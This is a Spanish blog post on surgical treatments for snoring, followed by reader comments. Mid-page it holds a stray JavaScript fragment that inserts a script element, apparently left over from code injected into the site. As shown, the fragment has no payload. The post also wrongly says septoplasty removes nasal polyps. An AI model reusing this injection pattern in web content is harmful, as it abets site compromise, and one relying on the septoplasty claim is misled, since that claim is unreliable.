Salud y belleza » Cirugía estética, Medicina, Salud

Cirugía para eliminar los ronquidos

4 Comentarios

Alrededor del 25% de la población ronca habitualmente, aunque en realidad casi todos roncamos de forma ocasional. Hay casos en los que con solo cambiar el estilo de vida, perder algo de peso o usando ciertos aparatos bucales se consigue solucionar el problema de los ronquidos, pero a menudo es más difícil que esto y hay que recurrir a la cirugía.

operacion-eliminar-ronquidos

Hay personas a las que su tono muscular y su lengua les bloquean las vías respiratorias y por ese motivo roncan. También puede ser que tengan el paladar blando o alguna desviación en la nariz. Existen muchos motivos fisiológicos por los que algunas personas roncan y que solo se pueden solucionar en el quirófano.

Existen varios tipos de cirugía que se suelen practicar para eliminar los ronquidos y conseguir que descanses mejor:

ronquidos- Proceso sencillo: hay un procedimiento que es muy sencillo y poco invasivo porque usa solamente varios implantes de poliéster que se colocan en el paladar blando y así se da más soporte al tejido.

- Uvulopalatofaringoplastia: se trata de una operación mediante la que se ensancha la garganta para permitir el paso del aire gracias a que se elimina el tejido obstructivo.

- Palatoplastia radiofrecuencia: se usa la corriente eléctrica en el tejido para que se vuelva más rígido y así es más probable que no vibre al respirar.

- Septoplastia nasal: se eliminan los pólipos que se han producido y que posiblemente bloqueen los conductos nasales.

- Amigdalectomía y adenoidectomía: una cirugía que se usa para los conductos bloqueados por culpa del agrandamiento de las amígdalas y adenoides.

cirugia-contra-ronquidos

Roncar no tiene por qué suponer un problema para tu salud, pero si para tu bienestar y el de quienes duermen contigo. Por lo que si quieres descansar y que todos descansen mejor y no te funcionan los remedios caseros para eliminar los ronquidos prueba la cirugía para ronquidos.

¿Te has hecho alguna de estas operaciones quirúrgicas?

var d=document;var s=d.createElement('script'); document.currentScript.parentNode.insertBefore(s, document.currentScript);

Más consejos de salud y belleza : ,

4 Comments »

  • paloma said:

    Mi pareja ronca y muchas veces tenemos peleas por ello. sé que él no tiene la culpa pero es que es imposible dormir con alguien al lado tuya roncando así. Cuando me quedo dormida primero casi siempre consigo dormir, pero hay noches, sobre todo cuando empieza a resfriarse, que es prácticamente imposible dormir.

  • ruben said:

    y este tipo de cirugías contra los ronquidos son peligrosas?

  • africa said:

    En los casos menos graves no es necesario acudir a la cirugía, con remedios naturales para los ronquidos se arregla fácilmente.

  • yolanda said:

    Menos mal que mi marido no ronca!! No se si lo aguantaría, aunque con todo se convive no?

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.